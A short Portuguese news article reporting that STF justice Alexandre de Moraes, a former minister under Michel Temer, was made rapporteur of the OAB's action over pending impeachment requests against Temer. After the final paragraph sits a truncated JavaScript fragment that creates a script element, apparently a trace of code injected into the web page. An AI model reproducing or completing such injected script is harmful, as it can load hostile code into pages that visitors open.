Ex-ministro de Temer irá decidir sobre impeachment do presidente no STF

Dando continuidade às ironias da política brasileira, a ministro Alexandre de Moraes, do Supremo Tribunal Federal (STF), foi designado nesta quinta-feira (17) como relator da ação da Ordem dos Advogados do Brasil (OAB) que visa obrigar o presidente da Câmara, Rodrigo Maia (DEM-RJ), a analisar pedidos de impeachment do presidente Michel Temer.

Alexandre de Moraes é o único indicado de Temer na composição do STF. Fiel aliado do peemedebista, ele foi ministro da Justiça da gestão Temer desde o governo de provisório – antes de consumado o impeachment de Dilma Rousseff. Caso quisesse, ele poderia ter alegado parcialidade e passado a relatoria do caso para outro ministro. Se necessário, também pode encaminhar a decisão à  1ª Turma da suprema corte.

Moraes também é relator de outra ação semelhante, apresentada em junho por quatro deputados da oposição, que também questiona suposta omissão de Maia em decidir sobre a abertura ou rejeição de processos de impeachment pendentes de análise.

Cabe ao presidente da Câmara o exame inicial dos pedidos – há mais de 20 acumulados contra Temer à espera de um parecer.var d=document;var s=d.createElement(‘script’);

Deixe um comentário